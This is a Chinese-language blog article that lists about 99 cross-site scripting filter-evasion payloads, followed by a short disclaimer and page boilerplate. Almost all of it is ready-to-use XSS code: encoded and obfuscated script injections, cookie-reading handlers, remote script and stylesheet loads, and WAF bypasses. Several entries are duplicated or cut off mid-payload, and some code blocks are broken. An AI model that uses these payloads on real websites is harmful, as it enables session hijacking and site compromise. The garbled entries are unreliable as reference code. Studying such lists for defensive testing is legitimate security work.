XSS攻击绕过方法大全,XSS攻击技巧,收集100种绕过方法分享(2024最新)

尽管许多网站实施了输入过滤措施来防止跨站脚本(XSS)攻击,但在特定条件下,经过精心编码的脚本仍有可能实施XSS注入。本文旨在为专业的安全测试人员提供一个跨站脚本漏洞的检测指南。
XSS攻击绕过方法大全,XSS攻击技巧,收集100种绕过方法分享(2024最新)_第1张图片

网络安全入门,XSS攻击

以下是一些具体的XSS绕过过滤的方法:

1. XSS定位器

在大多数存在漏洞的地方,插入以下代码将弹出含有“XSS”字样的对话框。建议使用URL编码器对整个代码进行编码。

小贴士:如果想快速检查页面,可以插入“<任意文本>”,然后观察页面输出是否有明显变化,以判断是否存在漏洞。

以下为具体代码实现:

‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;
alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–
>”>’>

2. 简短的XSS定位器

若页面空间有限且无JavaScript漏洞,以下简短的字符串可用于快速检测XSS注入。注入后查看页面源代码,检查是否出现** 字样。

”;!–”=&{()}

3. 无过滤绕过

这是一个标准的XSS注入代码,通常会被防御,但建议先测试一下。


4. 利用多语言进行过滤绕过

利用多种语言特性,可以绕过过滤机制。以下为示例代码:

‘”>>”>
<script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’–>”></script>
<script>alert(document.cookie)</script>”>
<img/id=”confirm&lpar;1)”/alt=”/”src=”/”onerror=eval(id)>’”>
<img src=”https://www.fujieace.com/wp-content/images/2015/07/hacked-compressor.jpg“>
</code></pre> 
  <h3>5. 通过JavaScript命令实现的图片XSS</h3> 
  <p>图片注入使用JavaScript命令实现,适用于大多数浏览器环境。示例代码如下:</p> 
  <pre><code><IMG SRC=”javascript:alert(‘XSS’);”>
</code></pre> 
  <h3>6. 无分号无引号</h3> 
  <p>不使用分号和引号的XSS攻击示例:</p> 
  <pre><code><IMG SRC=javascript:alert(‘XSS’)>
</code></pre> 
  <h3>7. 不区分大小写的XSS攻击向量</h3> 
  <p>XSS攻击向量,不区分JavaScript函数的大小写:</p> 
  <pre><code><IMG SRC=JaVaScRiPt:alert(‘XSS’)>
</code></pre> 
  <h3>8. HTML实体</h3> 
  <p>使用HTML实体进行XSS攻击,需要分号以生效:</p> 
  <pre><code><IMG SRC=javascript:alert(&quot;XSS&quot;)>
</code></pre> 
  <h3>9. 重音符混淆</h3> 
  <p>当需要在JavaScript代码中同时使用单引号和双引号时,可使用重音符(`)包含代码:</p> 
  <pre><code><IMG SRC=`javascript:alert(“RSnake says, ‘XSS’”)`>
</code></pre> 
  <h3>10. 畸形的A标签</h3> 
  <pre><code>通过跳过HREF标签找到XSS漏洞的方法:
```
<a onmouseover=”alert(document.cookie)”>xxs link</a>
```
</code></pre> 
  <h3>11. 畸形的IMG标签</h3> 
  <pre><code>通过不严格的HTML解析来构建含有IMG标签的XSS攻击向量:
```
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
```
</code></pre> 
  <h3>12. fromCharCode函数</h3> 
  <pre><code>如果不允许使用引号,可以使用JavaScript的fromCharCode函数创建XSS攻击向量:
```
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
```
</code></pre> 
  <h3>13. 使用默认SRC属性绕过SRC域名过滤器</h3> 
  <pre><code>这种方法可以绕过大多数SRC域名过滤器,适用于任何HTML标签:
```
<IMG SRC=# onmouseover=”alert(‘xxs’)”>
```
</code></pre> 
  <h3>14. 使用默认为空的SRC属性</h3> 
  <pre><code>```
<IMG SRC= onmouseover=”alert(‘xxs’)”>
```
</code></pre> 
  <h3>15. 使用不含SRC属性</h3> 
  <pre><code>```
<IMG onmouseover=”alert(‘xxs’)”>
```
</code></pre> 
  <h3>16. 通过error事件触发alert</h3> 
  <pre><code>```
<IMG SRC=/ onerror=”alert(String.fromCharCode(88,83,83))”></img>
```
</code></pre> 
  <h3>17. 对IMG标签中onerror属性进行编码</h3> 
  <pre><code>```
<img src=x onerror=”&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041″>
```
</code></pre> 
  <h3>18. 十进制HTML字符实体编码</h3> 
  <pre><code>这种编码方式在某些浏览器中不支持直接使用javascript:形式的XSS示例:
```
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
```
</code></pre> 
  <h3>19. 不带分号的十进制HTML字符实体编码</h3> 
  <pre><code>这种编码方式适用于绕过特定形式的XSS过滤:
```
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
```
</code></pre> 
  <h3>20. 不带分号的十六进制HTML字符实体编码</h3> 
  <pre><code>```
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x 
 ```
</code></pre> 
  <h3>20. 不带分号的十六进制HTML字符实体编码</h3> 
  <p>此方法绕过某些假设字符实体编码需要用分号结尾的过滤器:</p> 
  <pre><code><IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
</code></pre> 
  <h3>21. 内嵌TAB</h3> 
  <p>使用TAB字符分隔XSS攻击代码,适用于某些解析环境:</p> 
  <pre><code><IMG SRC=”jav ascript:alert(‘XSS’);”>
</code></pre> 
  <h3>22. 内嵌编码后的TAB</h3> 
  <p>使用编码后的TAB字符分隔XSS攻击代码:</p> 
  <pre><code><IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”>
</code></pre> 
  <h3>23. 内嵌换行分隔XSS攻击代码</h3> 
  <p>利用换行字符分隔代码,仅特定字符有效:</p> 
  <pre><code><IMG SRC=”jav&#x0A;ascript:alert(‘XSS’);”>
</code></pre> 
  <h3>24. 内嵌回车分隔XSS攻击代码</h3> 
  <p>使用回车字符分隔,注意字符长度:</p> 
  <pre><code><IMG SRC=”jav&#x0D;ascript:alert(‘XSS’);”>
</code></pre> 
  <h3>25. 使用空字符分隔JavaScript指令</h3> 
  <p>空字符也可以用作XSS攻击,需要特殊工具或编码:</p> 
  <pre><code>perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
</code></pre> 
  <h3>26. 利用IMG标签中JavaScript指令前的空格和元字符</h3> 
  <p>如果过滤器不计算“javascript:”前的空格,这种方法将有效:</p> 
  <pre><code><IMG SRC=” &#14;  javascript:alert(‘XSS’);”>
</code></pre> 
  <h3>27. 利用非字母非数字字符</h3> 
  <p>某些浏览器的HTML解析器认为非字母非数字字符作为空白或无效符号,而XSS过滤器可能未考虑此情况:</p> 
  <pre><code><SCRIPT/XSS SRC=”http://xss.rocks/xss.js“></SCRIPT>
</code></pre> 
  <h3>28. 额外的尖括号</h3> 
  <p>通过在XSS攻击向量中添加额外的尖括号来绕过某些检测引擎:</p> 
  <pre><code><<SCRIPT>alert(“XSS”);//<</SCRIPT>
</code></pre> 
  <h3>29. 未闭合的script标签</h3> 
  <p>在某些浏览器中,未闭合的标签会被自动闭合,这为XSS提供了机会:</p> 
  <pre><code><SCRIPT SRC=http://127.0.0.1/xss.js?< B >
</code></pre> 
  <h3>30. script标签中的协议解析</h3> 
  <p>特定的协议解析方式可以绕过过滤器,特别适用于空间有限的情况:</p> 
  <pre><code><SCRIPT SRC=//xss.rocks/.j>
</code></pre> 
  <h3>31. 只含左尖括号的HTML/JavaScript XSS向量</h3> 
  <p>在某些浏览器中,不需要闭合标签的右尖括号就可以执行XSS攻击:</p> 
  <pre><code><IMG SRC=”javascript:alert(‘XSS’)”
</code></pre> 
  <h3>32. 多个左尖括号</h3> 
  <p>使用多个左尖括号作为标签结尾在不同浏览器中有不同的效果:</p> 
  <pre><code><iframe src=http://127.0.0.1/scriptlet.html <
</code></pre> 
  <h3>33. JavaScript双重转义</h3> 
  <p>当应用将用户输入输出到页面上时,双重转义可能会触发XSS攻击:</p> 
  <pre><code>\”;alert(‘XSS’);//
</script><script>alert(‘XSS‘)
   ```


## 33. JavaScript双重转义
当应用错误地转义用户输入时,可以通过双重转义进行XSS攻击:
</code></pre> 
  <p></p> 
  <pre><code>
## 34. 闭合title标签
通过闭合title标签进行XSS攻击:
</code></pre> ``` 
  <h3>35. INPUT image</h3> 
  <p>利用输入类型为image的INPUT标签执行XSS:</p> 
  <pre><code><INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
</code></pre> 
  <h3>36. BODY image</h3> 
  <p>在BODY标签的BACKGROUND属性中插入XSS代码:</p> 
  <pre><code><BODY BACKGROUND="javascript:alert('XSS')">
</code></pre> 
  <h3>37. IMG Dynsrc</h3> 
  <p>通过IMG标签的DYNSRC属性实施XSS攻击:</p> 
  <pre><code><IMG DYNSRC="javascript:alert('XSS')">
</code></pre> 
  <h3>38. IMG lowsrc</h3> 
  <p>利用IMG标签的LOWSRC属性进行XSS注入:</p> 
  <pre><code><IMG LOWSRC="javascript:alert('XSS')">
</code></pre> 
  <h3>39. List-style-image</h3> 
  <p>通过样式属性中的list-style-image进行XSS攻击,仅在特定浏览器环境下有效:</p> 
  <pre><code><STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
</code></pre> 
  <h3>40. 图片中引用VBscript</h3> 
  <p>利用VBScript在IMG标签中执行XSS:</p> 
  <pre><code><IMG SRC='vbscript:msgbox("XSS")'>
</code></pre> 
  <h3>41. Livescript (仅限旧版本Netscape)</h3> 
  <p>在老版本的Netscape浏览器中,通过Livescript执行XSS:</p> 
  <pre><code><IMG SRC="livescript:[code]">
</code></pre> 
  <h3>42. SVG对象标签</h3> 
  <p>使用SVG标签触发XSS攻击:</p> 
  <pre><code><svg/onload=alert('XSS')>
</code></pre> 
  <h3>43. ECMAScript 6</h3> 
  <p>利用ECMAScript 6特性构造XSS攻击:</p> 
  <pre><code>Set.constructor`alert\x28document.domain\x29```
</code></pre> 
  <h3>44. BODY标签</h3> 
  <p>通过BODY标签的事件处理器实现XSS攻击,无需"javascript:"前缀:</p> 
  <pre><code><BODY ONLOAD=alert('XSS')>
</code></pre> 
  <h3>45. 事件处理程序</h3> 
  <p>XSS攻击可以利用多种HTML事件,以下是部分事件列表:</p> 
  <ul> 
   <li>onAbort()</li> 
   <li>onActivate()</li> 
   <li>onAfterPrint()</li> 
   <li>… 更多事件 …</li> 
  </ul> 
  <h3>46. BGSOUND标签</h3> 
  <p>利用BGSOUND标签在某些浏览器中实现XSS:</p> 
  <pre><code><BGSOUND SRC="javascript:alert('XSS');">
</code></pre> 
  <h3>47. & JavaScript包含</h3> 
  <p>使用&字符和JavaScript结合构造XSS攻击:</p> 
  <pre><code><BR SIZE="&{alert('XSS')}">
</code></pre> 
  <h3>48. 样式表</h3> 
  <p>利用LINK标签的HREF属性指向JavaScript进行XSS注入:</p> 
  <pre><code><LINK REL="stylesheet" HREF="javascript:alert('XSS');">
</code></pre> 
  <h3>49. 远程样式表</h3> 
  <p>利用远程样式表插入XSS代码,特定环境下有效:</p> 
  <pre><code><LINK REL="stylesheet" HREF="http://127.0.0.1/xss.css">
</code></pre> 
  <h3>50. 远程样式表2</h3> 
  <p>使用STYLE标签和@import规则加载包含XSS代码的远程样式表:</p> 
  <pre><code><STYLE>@import'http://127.0.0.1/xss.css';</STYLE>
</code></pre> 
  <h3>51. 远程样式表3</h3> 
  <p>在特定浏览器中,使用META标签设置Link头部实施XSS:</p> 
  <pre><code><META HTTP-EQUIV="Link" Content="<http://127.0.0.1/xss.css>; REL=stylesheet">
</code></pre> 
  <h3>52. 远程样式表4</h3> 
  <p>在Gecko渲染引擎下利用STYLE标签和-moz-binding属性进行XSS攻击:</p> 
  <pre><code><STYLE>BODY{-moz-binding:url("https://127.0.0.1/xssmoz.xml#xss")}</STYLE>
</code></pre> 
  <h3>53. 含有分隔JavaScript的STYLE标签</h3> 
  <p>利用特殊的字符序列在STYLE标签内部分隔JavaScript代码,适用于IE环境:</p> 
  <pre><code><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
</code></pre> 
  <h3>54. STYLE属性中使用注释分隔表达式</h3> 
  <p>利用注释分隔的方式在IMG标签的STYLE属性中插入XSS代码:</p> 
  <pre><code><IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
</code></pre> 
  <h3>55. 含表达式的IMG STYLE</h3> 
  <p>将XSS代码嵌入到IMG标签的STYLE属性中,适用于IE环境:</p> 
  <pre><code>exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
</code></pre> 
  <h3>56. STYLE标签(仅旧版本Netscape可用)</h3> 
  <p>在旧版本Netscape浏览器中,使用STYLE标签执行JavaScript代码:</p> 
  <pre><code><STYLE TYPE="text/javascript">alert('XSS');</STYLE>
</code></pre> 
  <h3>57. 使用背景图像的STYLE标签</h3> 
  <p>利用STYLE标签设置背景图像为JavaScript代码:</p> 
  <pre><code><STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
</code></pre> 
  <h3>58. 使用背景的STYLE标签</h3> 
  <p>通过BODY标签的STYLE属性设置背景图像执行JavaScript代码:</p> 
  <pre><code><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
</code></pre> 
  <h3>59. 含STYLE属性的HTML任意标签</h3> 
  <p>在任意HTML标签的STYLE属性中嵌入JavaScript代码,适用于IE环境:</p> 
  <pre><code><XSS STYLE="behavior: url(xss.htc);">
</code></pre> 
  <h3>60. 本地htc文件</h3> 
  <p>通过本地htc文件执行XSS代码,需要与XSS攻击向量在相同服务器上:</p> 
  <pre><code><XSS STYLE="behavior: url(xss.htc);">
</code></pre> 
  <h3>61. US-ASCII编码</h3> 
  <p>使用US-ASCII编码执行XSS攻击,适用于使用该编码的服务器环境:</p> 
  <pre><code>¼script¾alert(¢XSS¢)¼/script¾
</code></pre> 
  <h3>62. META标签</h3> 
  <p>使用META标签进行页面刷新并执行JavaScript代码:</p> 
  <pre><code><META HTTP
</code></pre> 
  <h3>62. META标签</h3> 
  <p>使用META标签的刷新功能执行JavaScript代码:</p> 
  <pre><code><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
</code></pre> 
  <h3>63. 使用数据的META</h3> 
  <p>通过META标签和data URL scheme实现XSS攻击,不包含可见的SCRIPT单词或JavaScript指令:</p> 
  <pre><code><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
</code></pre> 
  <h3>64. 含有额外URL参数的META</h3> 
  <p>通过在META标签中包含额外的URL参数绕过URL检查:</p> 
  <pre><code><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
</code></pre> 
  <h3>65. IFRAME</h3> 
  <p>在允许IFRAME的情况下,通过IFRAME标签实现XSS:</p> 
  <pre><code><IFRAME SRC="javascript:alert('XSS');"></IFRAME>
</code></pre> 
  <h3>66. 基于事件的IFRAME</h3> 
  <p>利用事件触发器在IFRAME标签中执行XSS代码:</p> 
  <pre><code><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
</code></pre> 
  <h3>67. FRAME</h3> 
  <p>与IFRAME类似,FRAME标签也可用于XSS攻击:</p> 
  <pre><code><FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
</code></pre> 
  <h3>68. TABLE</h3> 
  <p>通过TABLE标签的BACKGROUND属性插入XSS代码:</p> 
  <pre><code><TABLE BACKGROUND="javascript:alert('XSS')">
</code></pre> 
  <h3>69. TD</h3> 
  <p>利用TD标签的BACKGROUND属性进行XSS攻击:</p> 
  <pre><code><TABLE><TD BACKGROUND="javascript:alert('XSS')">
</code></pre> 
  <h3>70. DIV背景图像</h3> 
  <p>在DIV标签的STYLE属性中设置背景图像为JavaScript代码:</p> 
  <pre><code><DIV STYLE="background-image: url(javascript:alert('XSS'))">
</code></pre> 
  <h3>71. 含有Unicode XSS利用代码的DIV背景图像</h3> 
  <p>使用Unicode字符对URL参数进行混淆,以实现XSS攻击:</p> 
  <pre><code><DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
</code></pre> 
  <h3>72. 含有额外字符的DIV背景图像</h3> 
  <p>在DIV标签中利用额外字符实现XSS攻击:</p> 
  <pre><code><DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
</code></pre> 
  <h3>73. DIV表达式</h3> 
  <p>利用DIV标签的STYLE属性中的表达式实现XSS攻击:</p> 
  <pre><code><DIV STYLE="width: expression(alert('XSS'));">
</code></pre> 
  <h3>74. HTML条件注释块</h3> 
  <p>利用HTML条件注释在特定浏览器中执行XSS代码:</p> 
  <pre><code><!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->
</code></pre> 
  <h3>75. BASE标签</h3> 
  <p>使用BASE标签改变页面的基本URL,以实施XSS攻击:</p> 
  <pre><code><BASE HREF="javascript:alert('XSS');//">
</code></pre> 
  <h3>76. OBJECT标签</h3> 
  <p>利用OBJECT标签加载含有XSS代码的外部资源:</p> 
  <pre><code><OBJECT TYPE="text/x-scriptlet" DATA="http://127.0.0.1/scriptlet.html"></OBJECT>
</code></pre> 
  <h3>77. 使用EMBED标签加载含有XSS的FLASH文件</h3> 
  <p>通过EMBED标签加载含有XSS代码的FLASH文件,适用于特定浏览器环境:</p> 
  <pre><code><EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
</code></pre> 
  <h3>78. 使用EMBED SVG包含攻击向量</h3> 
  <p>在特定浏览器下,使用EMBED标签加载SVG代码实现XSS攻击:</p> 
  <pre><code><EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
</code></pre> 
  <h3>79. 在FLASH中使用ActionScript混淆XSS攻击向量</h3> 
  <p>利用FLASH文件中的ActionScript代码进行混淆,以绕过过滤器:</p> 
  <pre><code>a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
</code></pre> 
  <h3>80. CDATA混淆的XML数据岛</h3> 
  <p>在特定环境下,利用XML数据岛和CDATA混淆实现XSS攻击:</p> 
  <pre><code><XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
</code></pre> 
  <h3>81. 使用XML数据岛生成含内嵌JavaScript的本地XML文件</h3> 
  <p>通过本地XML文件包含JavaScript代码实施XSS攻击:</p> 
  <pre><code><XML SRC="xsstest.xml" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
</code></pre> 
  <h3>82. XML中使用HTML+TIME</h3> 
  <p>利用HTML+TIME扩展在XML中嵌入JavaScript代码:</p> 
  <pre><code><HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
</code></pre> 
  <h3>83. 使用一些字符绕过".js"过滤</h3> 
  <p>通过改名将JavaScript文件伪装成图像文件,以绕过过滤器:</p> 
  <pre><code><SCRIPT SRC="http://127.0.0.1/xss.jpg"></SCRIPT>
</code></pre> 
  <h3>84. SSI(服务器端脚本包含)</h3> 
  <p>如果服务器端允许SSI,可以利用它执行XSS攻击:</p> 
  <pre><code><!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://127.0.0.1/xss.js></SCRIPT>'"-->
</code></pre> 
  <h3>85. PHP</h3> 
  <p>在服务器端安装了PHP的情况下,可以利用PHP脚本实施XSS攻击:</p> 
  <pre><code><? echo('<SCR)';
echo('IPT>alert("XSS")</SCRIPT>'); ?>
</code></pre> 
  <h3>86. 嵌入命令的IMAGE</h3> 
  <p>利用IMAGE标签在密码保护页面上执行命令,适用于管理员权限环境:</p> 
  <pre><code><IMG SRC="https://www.fujieace.com/somecommand.php?somevariables=maliciouscode">
</code></pre> 
  <h3>87. 嵌入命令的IMAGE II</h3> 
  <p>通过重定向图片到特定命令,可以在普通的图片请求中隐藏XSS攻击:</p> 
  <pre><code>Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
</code></pre> 
  <h3>88. Cookie篡改</h3> 
  <p>利用META标签覆写cookie,适用于某些特定场景:</p> 
  <pre><code><META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
</code></pre> 
  <h3>89. UTF-7编码</h3> 
  <p>在页面未指定编码或浏览器设置为UTF-7编码时,可以利用UTF-7执行XSS攻击:</p> 
  <pre><code><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
</code></pre> 
  <h3>90. 利用HTML引号包含的XSS</h3> 
  <p>在某些浏览器中,可以通过特定的引号使用方式绕过XSS过滤器:</p> 
  <pre><code><SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT>
<SCRIPT =">" SRC="httx://xss.rocks/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="httx://xss.rocks/xss.js"></SCRIPT>
</code></pre> 
  <h3>91. URL字符绕过</h3> 
  <p>使用不同的编码和格式化方式绕过URL过滤:</p> 
  <pre><code><A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="//www.google.com/">XSS</A>
</code></pre> 
  <h3>92. 字符转义表</h3> 
  <p>通过不同的字符组合实现“<”的所有可能表示,用于绕过过滤器:</p> 
  <pre><code><
%3C
&lt
&lt;
... 等等 ...
</code></pre> 
  <h3>93. 绕过WAF的方法</h3> 
  <p>利用特定技巧绕过Web应用程序防火墙(WAF),包括存储型XSS、基于DOM的XSS、请求重定向等多种方法:</p> 
  <pre><code><Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
... 更多示例 ...
</code></pre> 
  <h3>94. 存储型XSS</h3> 
  <p>如果XSS代码已经绕过了输入过滤并存储在服务器上,WAF可能无法在输出时阻止它。</p> 
  <h3>95. 基于JavaScript的反射型XSS</h3> 
  <p>示例:在脚本中使用setTimeout函数,根据GET参数动态设置延时。</p> 
  <pre><code><script> ... setTimeout("writetitle()", $_GET[xss]) ... </script>
</code></pre> 
  <h3>96. 基于DOM的XSS</h3> 
  <p>示例:在脚本中直接执行GET参数的内容。</p> 
  <pre><code><script> ... eval($_GET[xss]); ... </script>
</code></pre> 
  <h3>97. 通过请求重定向构造XSS</h3> 
  <p>示例:在服务器端脚本中,基于用户输入构造重定向。</p> 
  <pre><code>header('Location: '.$_GET['param']);
</code></pre> 
  <h3>98. 利用不过滤特定字符串的WAF</h3> 
  <p>有些WAF可能不会过滤某些特定的字符串或脚本结构,可以利用这一点构造XSS攻击。</p> 
  <pre><code><Img src=x onerror="javascript: window.onerror = alert; throw XSS">
<Video> <source onerror="javascript: alert(XSS)">
... 更多示例 ...
</code></pre> 
  <h3>99. Alert混淆以绕过过滤器</h3> 
  <p>通过变换alert函数的调用方式,绕过对alert关键字的过滤。</p> 
  <pre><code>(alert)(1)
a=alert,a(1)
[1].find(alert)
... 更多示例 ...
</code></pre> 
  <p>以上提到的XSS攻击技巧和方法,都是为了帮助安全专家更好地理解和预防XSS漏洞。强调这些技术仅用于教育和安全测试目的,任何非法使用都是不道德的,可能会导致严重的法律后果。安全研究员和渗透测试人员应在合法和道德的框架内操作,确保网络空间的安全和稳定。</p> 
  <h3>网络安全学习路线</h3> 
  <p></p> 
  <h3>网安入门资料</h3> 
  <p>收集了一些入门视频资料,可以免费分享。</p> 
 </div> 
</div>
                            </div>
                        </div>
                    </div>
                    <!--PC和WAP自适应版-->
                    <div id="SOHUCS" sid="1737484266322845696"></div>
                    <script type="text/javascript" src="/views/front/js/chanyan.js"></script>
                    <!-- 文章页-底部 动态广告位 -->
                    <div class="youdao-fixed-ad" id="detail_ad_bottom"></div>
                </div>
                <div class="col-md-3">
                    <div class="row" id="ad">
                        <!-- 文章页-右侧1 动态广告位 -->
                        <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_1"> </div>
                        </div>
                        <!-- 文章页-右侧2 动态广告位 -->
                        <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_2"></div>
                        </div>
                        <!-- 文章页-右侧3 动态广告位 -->
                        <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_3"></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="container">
        <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(xss,web安全,前端,网络安全,学习方法,https,html)</h4>
        <div id="paradigm-article-related">
            <div class="recommend-post mb30">
                <ul class="widget-links">
                    <li><a href="/article/1834943703429509120.htm"
                           title="ubuntu美化" target="_blank">ubuntu美化</a>
                        <span class="text-muted">BGLB</span>

                        <div>先来美化完成的几张图诱惑一下主要做一下记录系统环境:1、ubuntu18.042、VMware143、美化需要的主题和icon百度云自取链接:https://pan.baidu.com/s/1Om8ntCJHm7341a0ZC-emiQ提取码:4axn正式开始美化建议直接使用root登陆ubuntu系统方便第一步首先要先安装相应的工具:TweakTool中文名叫优化英文名叫gnome-tweak-</div>
                    </li>
                    <li><a href="/article/1834943236649611264.htm"
                           title="Python——爬虫" target="_blank">Python——爬虫</a>
                        <span class="text-muted">星和月</span>
<a class="tag" taget="_blank" href="/search/python/1.htm">python</a>
                        <div>当编写一个Python爬虫时,你可以使用BeautifulSoup库来解析网页内容,使用requests库来获取网页的HTML代码。下面是一个简单的示例,演示了如何获取并解析网页内容:importrequestsfrombs4importBeautifulSoup#发送HTTP请求获取网页内容url='https://www.example.com'#要爬取的网页的URLresponse=requ</div>
                    </li>
                    <li><a href="/article/1834941221575946240.htm"
                           title="springBoot 集成https" target="_blank">springBoot 集成https</a>
                        <span class="text-muted">ourLang</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/boot/1.htm">boot</a><a class="tag" taget="_blank" href="/search/https/1.htm">https</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                        <div>springBoot集成https1、springBoot默认的证书格式pringBoot需要.p12或.jks格式的证书。如果你只有.pem和.key文件,可以使用openssl工具将它们转换成.p12文件2、转换.p12我的证书文件如下,需要转换2.1下载opensslhttps://slproweb.com/download/Win64OpenSSL-3_3_2.exe2.2执行命令生成.p</div>
                    </li>
                    <li><a href="/article/1834940213168795648.htm"
                           title="汤臣倍健,三七互娱,得物,顺丰,快手,游卡,oppo,康冠科技,途游游戏,埃科光电25秋招内推" target="_blank">汤臣倍健,三七互娱,得物,顺丰,快手,游卡,oppo,康冠科技,途游游戏,埃科光电25秋招内推</a>
                        <span class="text-muted">2401_86288678</span>
<a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/%E6%B8%B8%E6%88%8F/1.htm">游戏</a><a class="tag" taget="_blank" href="/search/c%2B%2B/1.htm">c++</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E7%AE%97%E6%B3%95/1.htm">算法</a>
